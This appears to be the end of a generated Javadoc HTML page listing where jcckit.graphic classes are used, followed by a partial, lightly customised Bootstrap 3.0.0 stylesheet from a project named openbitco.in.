<TD><B><A HREF="../../jcckit/graphic/class-use/BasicGraphicalElement.html#jcckit.graphic"><B>BasicGraphicalElement</B></A></B>
<BR>
Abstract superclass of all basic <A HREF="../../jcckit/graphic/GraphicalElement.html" title="interface in jcckit.graphic"><CODE>GraphicalElements</CODE></A>. </TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/ClippingRectangle.html#jcckit.graphic"><B>ClippingRectangle</B></A></B>
<BR>
Immutable class of a rectangular clipping area.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/ClippingShape.html#jcckit.graphic"><B>ClippingShape</B></A></B>
<BR>
Defining a clipping shape applied to all <A HREF="../../jcckit/graphic/GraphicalElement.html" title="interface in jcckit.graphic"><CODE>GraphicalElements</CODE></A> of a <A HREF="../../jcckit/graphic/GraphicalComposite.html" title="class in jcckit.graphic"><CODE>GraphicalComposite</CODE></A>.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/FillAttributes.html#jcckit.graphic"><B>FillAttributes</B></A></B>
<BR>
Interface for fill attributes.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/FontStyle.html#jcckit.graphic"><B>FontStyle</B></A></B>
<BR>
Font style constants.
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/GraphicalComposite.html#jcckit.graphic"><B>GraphicalComposite</B></A></B>
<BR>
Container for <A HREF="../../jcckit/graphic/GraphicalElement.html" title="interface in jcckit.graphic"><CODE>GraphicalElements</CODE></A>.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/GraphicalElement.html#jcckit.graphic"><B>GraphicalElement</B></A></B>
<BR>
Interface all graphical elements have to implement.
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/GraphicAttributes.html#jcckit.graphic"><B>GraphicAttributes</B></A></B>
<BR>
Marker interface for all types of graphic attributes
of a <A HREF="../../jcckit/graphic/BasicGraphicalElement.html" title="class in jcckit.graphic"><CODE>BasicGraphicalElement</CODE></A>. </TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/GraphPoint.html#jcckit.graphic"><B>GraphPoint</B></A></B>
<BR>
Immutable class of a two-dimensional point in the device-independent
coordinate system.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/LineAttributes.html#jcckit.graphic"><B>LineAttributes</B></A></B>
<BR>
Interface for line attributes.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/Oval.html#jcckit.graphic"><B>Oval</B></A></B>
<BR>
An oval (i.e.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/Polygon.html#jcckit.graphic"><B>Polygon</B></A></B>
<BR>
A polygon or polyline.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/Rectangle.html#jcckit.graphic"><B>Rectangle</B></A></B>
<BR>
A rectangle.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/Renderer.html#jcckit.graphic"><B>Renderer</B></A></B>
<BR>
Marker interface. </TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/ShapeAttributes.html#jcckit.graphic"><B>ShapeAttributes</B></A></B>
<BR>
Basic attributes for shapes.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/Text.html#jcckit.graphic"><B>Text</B></A></B>
<BR>
A single line of text.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/TextAttributes.html#jcckit.graphic"><B>TextAttributes</B></A></B>
<BR>
Interface for text attributes.</TD>
</TR>
</TABLE>
<P>
<A NAME="jcckit.plot"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TD COLSPAN=2><FONT SIZE="+2">
Classes in <A HREF="../../jcckit/graphic/package-summary.html">jcckit.graphic</A> used by <A HREF="../../jcckit/plot/package-summary.html">jcckit.plot</A></FONT></TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/Anchor.html#jcckit.plot"><B>Anchor</B></A></B>
<BR>
Anchor of a graphical element. </TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/ClippingRectangle.html#jcckit.plot"><B>ClippingRectangle</B></A></B>
<BR>
Immutable class of a rectangular clipping area.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/ClippingShape.html#jcckit.plot"><B>ClippingShape</B></A></B>
<BR>
Defining a clipping shape applied to all <A HREF="../../jcckit/graphic/GraphicalElement.html" title="interface in jcckit.graphic"><CODE>GraphicalElements</CODE></A> of a <A HREF="../../jcckit/graphic/GraphicalComposite.html" title="class in jcckit.graphic"><CODE>GraphicalComposite</CODE></A>.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/GraphicalComposite.html#jcckit.plot"><B>GraphicalComposite</B></A></B>
<BR>
Container for <A HREF="../../jcckit/graphic/GraphicalElement.html" title="interface in jcckit.graphic"><CODE>GraphicalElements</CODE></A>.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/GraphicalElement.html#jcckit.plot"><B>GraphicalElement</B></A></B>
<BR>
Interface all graphical elements have to implement.
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/GraphicAttributes.html#jcckit.plot"><B>GraphicAttributes</B></A></B>
<BR>
Marker interface for all types of graphic attributes
of a <A HREF="../../jcckit/graphic/BasicGraphicalElement.html" title="class in jcckit.graphic"><CODE>BasicGraphicalElement</CODE></A>. </TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/GraphPoint.html#jcckit.plot"><B>GraphPoint</B></A></B>
<BR>
Immutable class of a two-dimensional point in the device-independent
coordinate system.</TD>
</TR>
</TABLE>
<P>
<A NAME="jcckit.renderer"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TD COLSPAN=2><FONT SIZE="+2">
Classes in <A HREF="../../jcckit/graphic/package-summary.html">jcckit.graphic</A> used by <A HREF="../../jcckit/renderer/package-summary.html">jcckit.renderer</A></FONT></TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/Anchor.html#jcckit.renderer"><B>Anchor</B></A></B>
<BR>
Anchor of a graphical element. </TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/ClippingRectangle.html#jcckit.renderer"><B>ClippingRectangle</B></A></B>
<BR>
Immutable class of a rectangular clipping area.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/GraphicalComposite.html#jcckit.renderer"><B>GraphicalComposite</B></A></B>
<BR>
Container for <A HREF="../../jcckit/graphic/GraphicalElement.html" title="interface in jcckit.graphic"><CODE>GraphicalElements</CODE></A>.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/GraphicalCompositeRenderer.html#jcckit.renderer"><B>GraphicalCompositeRenderer</B></A></B>
<BR>
Interface of all <A HREF="../../jcckit/graphic/Renderer.html" title="interface in jcckit.graphic"><CODE>Renderers</CODE></A> who render a
<A HREF="../../jcckit/graphic/GraphicalComposite.html" title="class in jcckit.graphic"><CODE>GraphicalComposite</CODE></A>. </TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/GraphPoint.html#jcckit.renderer"><B>GraphPoint</B></A></B>
<BR>
Immutable class of a two-dimensional point in the device-independent
coordinate system.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/Oval.html#jcckit.renderer"><B>Oval</B></A></B>
<BR>
An oval (i.e.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/OvalRenderer.html#jcckit.renderer"><B>OvalRenderer</B></A></B>
<BR>
Interface of all <A HREF="../../jcckit/graphic/Renderer.html" title="interface in jcckit.graphic"><CODE>Renderers</CODE></A> who render a
<A HREF="../../jcckit/graphic/Oval.html" title="class in jcckit.graphic"><CODE>Oval</CODE></A>.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/Polygon.html#jcckit.renderer"><B>Polygon</B></A></B>
<BR>
A polygon or polyline.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/PolygonRenderer.html#jcckit.renderer"><B>PolygonRenderer</B></A></B>
<BR>
Interface of all <A HREF="../../jcckit/graphic/Renderer.html" title="interface in jcckit.graphic"><CODE>Renderers</CODE></A> who render an
instance of <A HREF="../../jcckit/graphic/Polygon.html" title="class in jcckit.graphic"><CODE>Polygon</CODE></A>.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/Rectangle.html#jcckit.renderer"><B>Rectangle</B></A></B>
<BR>
A rectangle.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/RectangleRenderer.html#jcckit.renderer"><B>RectangleRenderer</B></A></B>
<BR>
Interface of all <A HREF="../../jcckit/graphic/Renderer.html" title="interface in jcckit.graphic"><CODE>Renderers</CODE></A> who render a
<A HREF="../../jcckit/graphic/Rectangle.html" title="class in jcckit.graphic"><CODE>Rectangle</CODE></A>.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/Renderer.html#jcckit.renderer"><B>Renderer</B></A></B>
<BR>
Marker interface. </TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/Text.html#jcckit.renderer"><B>Text</B></A></B>
<BR>
A single line of text.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/TextRenderer.html#jcckit.renderer"><B>TextRenderer</B></A></B>
<BR>
Interface of all <A HREF="../../jcckit/graphic/Renderer.html" title="interface in jcckit.graphic"><CODE>Renderers</CODE></A> who render an
instance of <A HREF="../../jcckit/graphic/Text.html" title="class in jcckit.graphic"><CODE>Text</CODE></A>.</TD>
</TR>
</TABLE>
<P>
<A NAME="jcckit.transformation"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TD COLSPAN=2><FONT SIZE="+2">
Classes in <A HREF="../../jcckit/graphic/package-summary.html">jcckit.graphic</A> used by <A HREF="../../jcckit/transformation/package-summary.html">jcckit.transformation</A></FONT></TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/GraphPoint.html#jcckit.transformation"><B>GraphPoint</B></A></B>
<BR>
Immutable class of a two-dimensional point in the device-independent
coordinate system.</TD>
</TR>
</TABLE>
<P>
<HR>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<A NAME="navbar_bottom"><!-- --></A>
<A HREF="#skip-navbar_bottom" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=3 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Class</FONT> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
PREV
NEXT</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../index.html" target="_top"><B>FRAMES</B></A>
<A HREF="package-use.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_bottom"></A>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<HR>
</BODY>
</HTML>
|
openbitcoin/static/css/bootstrap.css
|
lyndsysimon/openbitco.in
|
/*!
* Bootstrap v3.0.0
*
* Copyright 2013 Twitter, Inc
* Licensed under the Apache License v2.0
* http://www.apache.org/licenses/LICENSE-2.0
*
* Designed and built with all the love in the world by @mdo and @fat.
*/
/*! normalize.css v2.1.0 | MIT License | git.io/normalize */
article,
aside,
details,
figcaption,
figure,
footer,
header,
hgroup,
main,
nav,
section,
summary {
display: block;
}
audio,
canvas,
video {
display: inline-block;
}
audio:not([controls]) {
display: none;
height:height: 0;
}
[hidden] {
display: none;
}
html {
font-smooth:always;
-webkit-font-smoothing: antialiased;
font-family: sans-serif;
-webkit-text-size-adjust: 100%;
-ms-text-size-adjust: 100%;
}
body {
margin: 0;
}
.navbar-static-top {
margin-bottom: 19px;
}
a {
text-decoration:none;
}
a:focus {
outline: thin dotted;
}
a:active,
a:hover {
text-decoration:none;
outline: 0;
}
h1 {
margin: 0.67em 0;
font-size: 2em;
}
abbr[title] {
border-bottom: 1px dotted;
}
b,
strong {
font-weight: bold;
}
dfn {
font-style: italic;
}
hr {
height: 0;
-moz-box-sizing: content-box;
box-sizing: content-box;
}
mark {
color: #000;
background: #ff0;
}
code,
kbd,
pre,
samp {
font-family: monospace, serif;
font-size: 1em;
}
pre {
white-space: pre-wrap;
}
q {
quotes: "\201C" "\201D" "\2018" "\2019";
}
small {
font-size: 80%;
}
sub,
sup {
position: relative;
font-size: 75%;
line-height: 0;
vertical-align: baseline;
}
sup {
top: -0.5em;
}
sub {
bottom: -0.25em;
}
img {
border: 0;
}
svg:not(:root) {
overflow: hidden;
}
figure {
margin: 0;
}
fieldset {
padding: 0.35em 0.625em 0.75em;
margin: 0 2px;
border: 1px solid #c0c0c0;
}
legend {
padding: 0;
border: 0;
}
button,
input,
select,
textarea {
margin: 0;
font-family: inherit;
font-size: 100%;
}
button,
input {
line-height: normal;
}
button,
select {
text-transform: none;
}
button,
html input[type="button"],
input[type="reset"],
input[type="submit"] {
cursor: pointer;
-webkit-appearance: button;
}
button[disabled],
html input[disabled] {
cursor: default;
}
input[type="checkbox"],
input[type="radio"] {
padding: 0;
box-sizing: border-box;
}
input[type="search"] {
-webkit-box-sizing: content-box;
-moz-box-sizing: content-box;
box-sizing: content-box;
-webkit-appearance: textfield;
}
input[type="search"]::-webkit-search-cancel-button,
input[type="search"]::-webkit-search-decoration {
-webkit-appearance: none;
}
button::-moz-focus-inner,
input::-moz-focus-inner {
padding: 0;
border: 0;
}
textarea {
overflow: auto;
vertical-align: top;
}
table {
border-collapse: collapse;
border-spacing: 0;
}
@media print {
* {
color: #000 !important;
text-shadow: none !important;
background: transparent !important;
box-shadow: none !important;
}
a,
a:visited {
text-decoration: underline;
}
a[href]:after {
content: " (" attr(href) ")";
}
abbr[title]:after {
content: " (" attr(title) ")";
}
.ir a:after,
a[href^="javascript:"]:after,
a[href^="#"]:after {
content: "";
}
pre,
blockquote {
border: 1px solid #999;
page-break-inside: avoid;
}
thead {
display: table-header-group;
}
tr,
img {
page-break-inside: avoid;
}
img {
max-width: 100% !important;
}
@page {
margin: 2cm .5cm;
}
p,
h2,
h3 {
orphans: 3;
widows: 3;
}
h2,
h3 {
page-break-after: avoid;
}
.navbar {
display: none;
}
.table td,
.table th {
background-color: #fff !important;
}
.btn > .caret,
.dropup > .btn > .caret {
border-top-color: #000 !important;
}
.label {
border: 1px solid #000;
}
.table {
border-collapse: collapse !important;
}
.table-bordered th,
.table-bordered td {
border: 1px solid #ddd !important;
}
}
*,
*:before,
*:after {
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
}
html {
font-size: 62.5%;
-webkit-tap-highlight-color: rgba(0, 0, 0, 0);
}
body {
font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
font-size: 14px;
line-height: 1.428571429;
color: #333333;
background-color: #aaaaaa;
}
input,
button,
select,
textarea {
font-family: inherit;
font-size: inherit;
line-height: inherit;
}
button,
input,
select[multiple],
textarea {
background-image: none;
}
a {
color: #FfFfFf;
text-decoration: none;
}
a:hover,
a:focus {
color: #ffb53d;
text-decoration: underline;
}
a:focus {
outline: thin dotted #333;
outline: 5px auto -webkit-focus-ring-color;
outline-offset: -2px;
}
img {
vertical-align: middle;
}
.img-responsive {
display: block;
height: auto;
max-width: 100%;
}
.img-rounded {
border-radius: 6px;
}
.img-thumbnail {
display: inline-block;
height: auto;
max-width: 100%;
padding: 4px;
line-height: 1.428571429;
background-color: #ffffff;
border: 1px solid #dddddd;
border-radius: 4px;
-webkit-transition: all 0.2s ease-in-out;
transition: all 0.2s ease-in-out;
}
.img-circle {
border-radius: 50%;
}
hr {
margin-top: 20px;
margin-bottom: 20px;
border: 0;
border-top: 1px solid #eeeeee;
}
.sr-only {
position: absolute;
width: 1px;
height: 1px;
padding: 0;
margin: -1px;
overflow: hidden;
clip: rect(0 0 0 0);
border: 0;
}
p {
margin: 0 0 10px;
}
.lead {
margin-bottom: 20px;
font-size: 16.099999999999998px;
font-weight: 200;
line-height: 1.4;
}
@media (min-width: 768px) {
.lead {
font-size: 21px;
}
}
small {
font-size: 85%;
}
cite {
font-style: normal;
}
.text-muted {
color: #999999;
}
.text-primary {
color: #FfFfFf;
}
.text-warning {
color: #c09853;
}
.text-danger {
color: #b94a48;
}
.text-success {
color: #468847;
}
.text-info {
color: #3a87ad;
}
.text-left {
text-align: left;
}
.text-right {
text-align: right;
}
.text-center {
text-align: center;
}
h1,
h2,
h3,
h4,
h5,
h6,
.h1,
.h2,
.h3,
.h4,
.h5,
.h6 {
font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
font-weight: 500;
line-height: 1.1;
}
h1 small,
h2 small,
h3 small,
h4 small,
h5 small,
h6 small,
.h1 small,
.h2 small,
.h3 small,
.h4 small,
.h5 small,
.h6 small {
font-weight: normal;
line-height: 1;
color: #999999;
}
h1,
h2,
h3 {
margin-top: 20px;
margin-bottom: 10px;
}
h4,
h5,
h6 {
margin-top: 10px;
margin-bottom: 10px;
}
h1,
.h1 {
font-size: 36px;
}
h2,
.h2 {
font-size: 30px;
}
h3,
.h3 {
font-size: 24px;
}
h4,
.h4 {
font-size: 18px;
}
h5,
.h5 {
font-size: 14px;
}
h6,
.h6 {
font-size: 12px;
}
h1 small,
.h1 small {
font-size: 24px;
}
h2 small,
.h2 small {
font-size: 18px;
}
h3 small,
.h3 small,
h4 small,
.h4 small {
font-size: 14px;
}
.page-header {
padding-bottom: 9px;
margin: 40px 0 20px;
border-bottom: 1px solid #eeeeee;
}
ul,
ol {
margin-top: 0;
margin-bottom: 10px;
}
ul ul,
ol ul,
ul ol,
ol ol {
margin-bottom: 0;
}
.list-unstyled {
padding-left: 0;
list-style: none;
}
.list-inline {
padding-left: 0;
list-style: none;
}
.list-inline > li {
display: inline-block;
padding-right: 5px;
padding-left: 5px;
}
dl {
margin-bottom: 20px;
}
dt,
dd {
line-height: 1.428571429;
}
dt {
font-weight: bold;
}
dd {
margin-left: 0;
}
@media (min-width: 768px) {
.dl-horizontal dt {
float: left;
width: 160px;
overflow: hidden;
clear: left;
text-align: right;
text-overflow: ellipsis;
white-space: nowrap;
}
.dl-horizontal dd {
margin-left: 180px;
}
.dl-horizontal dd:before,
.dl-horizontal dd:after {
display: table;
content: " ";
}
.dl-horizontal dd:after {
clear: both;
}
.dl-horizontal dd:before,
.dl-horizontal dd:after {
display: table;
content: " ";
}
.dl-horizontal dd:after {
clear: both;
}
}
abbr[title],
abbr[data-original-title] {
cursor: help;
border-bottom: 1px dotted #999999;
}
abbr.initialism {
font-size: 90%;
text-transform: uppercase;
}
blockquote {
padding: 10px 20px;
margin: 0 0 20px;
border-left: 5px solid #eeeeee;
}
blockquote p {
font-size: 17.5px;
font-weight: 300;
line-height: 1.25;
}
blockquote p:last-child {
margin-bottom: 0;
}
blockquote small {
display: block;
line-height: 1.428571429;
color: #999999;
}
blockquote small:before {
content: '\2014 \00A0';
}
blockquote.pull-right {
padding-right: 15px;
padding-left: 0;
border-right: 5px solid #eeeeee;
border-left: 0;
}
blockquote.pull-right p,
blockquote.pull-right small {
text-align: right;
}
blockquote.pull-right small:before {
content: '';
}
blockquote.pull-right small:after {
content: '\00A0 \2014';
}
q:before,
q:after,
blockquote:before,
blockquote:after {
content: "";
}
address {
display: block;
margin-bottom: 20px;
font-style: normal;
line-height: 1.428571429;
}
code,
pre {
font-family: Monaco, Menlo, Consolas, "Courier New", monospace;
}
code {
padding: 2px 4px;
font-size: 90%;
color: #c7254e;
white-space: nowrap;
background-color: #f9f2f4;
border-radius: 4px;
}
pre {
display: block;
padding: 9.5px;
margin: 0 0 10px;
font-size: 13px;
line-height: 1.428571429;
color: #333333;
word-break: break-all;
word-wrap: break-word;
background-color: #f5f5f5;
border: 1px solid #cccccc;
border-radius: 4px;
}
pre.prettyprint {
margin-bottom: 20px;
}
pre code {
padding: 0;
font-size: inherit;
color: inherit;
white-space: pre-wrap;
background-color: transparent;
border: 0;
}
.pre-scrollable {
max-height: 340px;
overflow-y: scroll;
}
.container {
padding-right: 15px;
padding-left: 15px;
margin-right: auto;
margin-left: auto;
}
.container:before,
.container:after {
display: table;
content: " ";
}
.container:after {
clear: both;
}
.container:before,
.container:after {
display: table;
content: " ";
}
.container:after {
clear: both;
}
.row {
margin-right: -15px;
margin-left: -15px;
}
.col-lg-4 a:active,
a:hover {
text-decoration:none;
}
.row:before,
.row:after {
display: table;
content: " ";
}
.row:after {
clear: both;
}
.row:before,
.row:after {
display: table;
content: " ";
}
.row:after {
clear: both;
}
.col-xs-1,
.col-xs-2,
.col-xs-3,
.col-xs-4,
.col-xs-5,
.col-xs-6,
.col-xs-7,
.col-xs-8,
.col-xs-9,
.col-xs-10,
.col-xs-11,
.col-xs-12,
.col-sm-1,
.col-sm-2,
.col-sm-3,
.col-sm-4,
.col-sm-5,
.col-sm-6,
.col-sm-7,
.col-sm-8,
.col-sm-9,
.col-sm-10,
.col-sm-11,
.col-sm-12,
.col-md-1,
.col-md-2,
.col-md-3,
.col-md-4,
.col-md-5,
.col-md-6,
.col-md-7,
.col-md-8,
.col-md-9,
.col-md-10,
.col-md-11,
.col-md-12,
.col-lg-1,
.col-lg-2,
.col-lg-3,
.col-lg-4,
.col-lg-5,
.col-lg-6,
.col-lg-7,
.col-lg-8,
.col-lg-9,
.col-lg-10,
.col-lg-11,
.col-lg-12 {
position: relative;
min-height: 1px;
padding-right: 15px;
padding-left: 15px;
}
.col-xs-1,
.col-xs-2,
.col-xs-3,
.col-xs-4,
.col-xs-5,
.col-xs-6,
.col-xs-7,
.col-xs-8,
.col-xs-9,
.col-xs-10,
.col-xs-11 {
float: left;
}
.col-xs-1 {
width: 8.333333333333332%;
}
.col-xs-2 {
width: 16.666666666666664%;
}
.col-xs-3 {
width: 25%;
}
.col-xs-4 {
width: 33.33333333333333%;
}
.col-xs-5 {
width: 41.66666666666667%;
}
.col-xs-6 {
width: 50%;
}
.col-xs-7 {
width: 58.333333333333336%;
}
.col-xs-8 {
width: 66.66666666666666%;
}
.col-xs-9 {
width: 75%;
}
.col-xs-10 {
width: 83.33333333333334%;
}
.col-xs-11 {
width: 91.66666666666666%;
}
.col-xs-12 {
width: 100%;
}
@media (min-width: 768px) {
.container {
max-width: 750px;
}
.col-sm-1,
.col-sm-2,
.col-sm-3,
.col-sm-4,
.col-sm-5,
.col-sm-6,
.col-sm-7,
.col-sm-8,
.col-sm-9,
.col-sm-10,
.col-sm-11 {
float: left;
}
.col-sm-1 {
width: 8.333333333333332%;
}
.col-sm-2 {
width: 16.666666666666664%;
}
.col-sm-3 {
width: 25%;
}
.col-sm-4 {
width: 33.33333333333333%;
}
.col-sm-5 {
width: 41.66666666666667%;
}
.col-sm-6 {
width: 50%;
}
.col-sm-7 {
width: 58.333333333333336%;
}
.col-sm-8 {
width: 66.66666666666666%;
}
.col-sm-9 {
width: 75%;
}
.col-sm-10 {
width: 83.33333333333334%;
}
.col-sm-11 {
width: 91.66666666666666%;
}
.col-sm-12 {
width: 100%;
}
.col-sm-push-1 {
left: 8.333333333333332%;
}
.col-sm-push-2 {
left: 16.666666666666664%;
}
.col-sm-push-3 {
left: 25%;
}
.col-sm-push-4 {
left: 33.33333333333333%;
}
.col-sm-push-5 {
left: 41.66666666666667%;
}
.col-sm-push-6 {
left: 50%;
}
.col-sm-push-7 {
left: 58.333333333333336%;
}
.col-sm-push-8 {
left: 66.66666666666666%;
}
.col-sm-push-9 {
left: 75%;
}
.col-sm-push-10 {
left: 83.33333333333334%;
}
.col-sm-push-11 {
left: 91.66666666666666%;
}
.col-sm-pull-1 {
right: 8.333333333333332%;
}
.col-sm-pull-2 {
right: 16.666666666666664%;
}
.col-sm-pull-3 {
right: 25%;
}
.col-sm-pull-4 {
right: 33.33333333333333%;
}
.col-sm-pull-5 {
right: 41.66666666666667%;
}
.col-sm-pull-6 {
right: 50%;
}
.col-sm-pull-7 {
right: 58.333333333333336%;
}
.col-sm-pull-8 {
right: 66.66666666666666%;
}
.col-sm-pull-9 {
right: 75%;
}
.col-sm-pull-10 {
right: 83.33333333333334%;
}
.col-sm-pull-11 {
right: 91.66666666666666%;
}
.col-sm-offset-1 {
margin-left: 8.333333333333332%;
}
.col-sm-offset-2 {
margin-left: 16.666666666666664%;
}
.col-sm-offset-3 {
margin-left: 25%;
}
.col-sm-offset-4 {
margin-left: 33.33333333333333%;
}
.col-sm-offset-5 {
margin-left: 41.66666666666667%;
}
.col-sm-offset-6 {
margin-left: 50%;
}
.col-sm-offset-7 {
margin-left: 58.333333333333336%;
}
.col-sm-offset-8 {
margin-left: 66.66666666666666%;
}
.col-sm-offset-9 {
margin-left: 75%;
}
.col-sm-offset-10 {
margin-left: 83.33333333333334%;
}
.col-sm-offset-11 {
margin-left: 91.66666666666666%;
}
}
@media (min-width: 992px) {
.container {
max-width: 970px;
}
.col-md-1,
.col-md-2,
.col-md-3,
.col-md-4,
.col-md-5,
.col-md-6,
.col-md-7,
.col-md-8,
.col-md-9,
.col-md-10,
.col-md-11 {
float: left;
}
.col-md-1 {
width: 8.333333333333332%;
}
.col-md-2 {
width: 16.666666666666664%;
}
.col-md-3 {
width: 25%;
}
.col-md-4 {
width: 33.33333333333333%;
}
.col-md-5 {
width: 41.66666666666667%;
}
.col-md-6 {
width: 50%;
}
.col-md-7 {
width: 58.333333333333336%;
}
.col-md-8 {
width: 66.66666666666666%;
}
.col-md-9 {
width: 75%;
}
.col-md-10 {
width: 83.33333333333334%;
}
.col-md-11 {
width: 91.66666666666666%;
}
